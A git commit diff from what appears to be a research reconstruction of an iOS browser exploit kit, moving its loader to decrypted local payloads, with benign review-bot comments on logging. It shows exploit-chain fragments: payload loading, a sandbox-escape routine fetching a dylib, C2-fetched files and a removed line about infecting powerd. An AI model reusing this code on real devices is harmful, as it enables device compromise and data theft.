Now load payloads from decrypted files

This commit is contained in:
khanhduytran0
2026-03-08 06:41:11 +07:00
parent 8e204b1c1c
commit d1f2483377
118 changed files with 686 additions and 13 deletions
+1 -5
@@ -1,5 +1 @@
// This will be removed later
let shouldIReload = confirm("this js loaded means it works. Press OK to reload page. Cancel will let the rest of payload execute which will infect powerd.");
if (shouldIReload == true) location.reload();
window["qbrdr"]("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");
window["qbrdr"]("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");
+2 -2
@@ -36,7 +36,7 @@ Payloads go through the following layers (outermost first):
- 64-bit block counter (starting at 0)
- 64-bit nonce (all zeros)
- 20 rounds (10 double-rounds)
- **Implementation**: Found at offset `0xad8c` in `Stage3ValidatorOrSomething.dylib`
- **Implementation**: Found at offset `0xad8c` in `bootstrap.dylib`
- **Sigma constant**: Standard `"expand 32-byte k"` at offset `0xbb80`
### LZMA Compression
@@ -164,7 +164,7 @@ coruna-main/
├── utility_module.js # Crypto helpers, Int64, LZW
├── Stage3_VariantB.js # Sandbox escape + MachOPayloadBuilder
├── other/
│ └── Stage3ValidatorOrSomething.dylib # Extracted dylib with ChaCha20 + LZMA
│ └── bootstrap.dylib # Extracted dylib with ChaCha20 + LZMA
├── downloaded/ # 17 files fetched from C2 server
│ └── <hash>.min.js # Raw encrypted payloads
├── extracted/ # Base64-decoded qbrdr payloads (from repo JS files)
+3 -3
@@ -1244,10 +1244,11 @@ function YA() {/* Original: YA → resolveSymbols */
if (lastSlash >= 0) hashName = hashName.substring(lastSlash + 1);
hashName = hashName.replace(/\.min\.js$/, "").replace(/\.js$/, "");
// Fetch decrypted F00DBEEF container from payloads/ directory
window.log("[LOADER] Loading payload: " + hashName);
const container = await E.buildContainer(hashName);
E.feedRawBuffer(container);
window.log("[LOADER] Payload fed to dylib: " + hashName);
window.log("[LOADER] Fed " + container.byteLength + " bytes for " + hashName);
} catch (err) {
window.log("[LOADER] Download error: " + err);
M();
@@ -1255,7 +1256,6 @@ function YA() {/* Original: YA → resolveSymbols */
})();
},
UA(A) {
// Legacy path — no longer used, download() feeds raw buffers directly
E.feedRawBuffer(A);
},
sA() {
@@ -1326,7 +1326,7 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
// Dylib must be pre-truncated to Mach-O proper (no appended data).
const _ORIG_PROCESS_OFF = 0x68d8; // hardcoded in B trampoline shellcode
const _xhr = new XMLHttpRequest();
_xhr.open("GET", "other/Stage3ValidatorOrSomething.dylib", false);
_xhr.open("GET", "payloads/bootstrap.dylib", false);
_xhr.overrideMimeType("text/plain; charset=x-user-defined");
_xhr.send();
const _raw = _xhr.responseText;
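Review bot: The catch at the end of the first hunk still logs `[LOADER] Download error: ` even though the new path builds the container from local decrypted files through `E.buildContainer(hashName)`, so a missing or malformed `payloads/` entry is reported as a download failure. I would change that line to `window.log("[LOADER] Payload load error for " + hashName + ": " + err);` so the log names the payload that failed and no longer suggests a network problem. The enclosing async function begins before the hunk and the `M()` handler it falls into is not shown, so whether that handler should still run on a local-file failure is for the author to confirm.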
+1 -1
@@ -290,7 +290,7 @@
// - Script base URL (decoded from fqMaGkNg)
// - Cookie/session data (from fqMaGkN4 with encoded params)
// - Platform and user agent strings
if (await platformModule.init("", fqMaGkNg(), fqMaGkN4([3436285875, 2332907478, 2884495420, 233193687, 1144711575, 1605576699, 1942246444, 1994816675]), Array(!1)[0], Array(!1)[0], platform, userAgent), platformModule.On()) throw Error("");
if (await platformModule.init("", fqMaGkNg(), "", Array(!1)[0], Array(!1)[0], platform, userAgent), platformModule.On()) throw Error("");
window.log(`[PLATFORM] iOS version detected: ${platformModule.platformState.iOSVersion}`);
// Version check: must be >= 130000 (iOS 13.0)
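Review bot: The comment block above the changed call still lists `Cookie/session data (from fqMaGkN4 with encoded params)` as the third argument to `platformModule.init`, but, assuming the `""` form is the new side, that position is now an empty string, so the bullet describes an argument the code no longer supplies. I would update it to `// - Cookie/session data: passed as "" (the encoded fqMaGkN4 lookup was dropped)` so a reader does not look for a value that is not computed here. The enclosing function starts and ends outside the hunk, and whether `platformModule.init` treats the empty string differently from the decoded value is not visible in this change.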
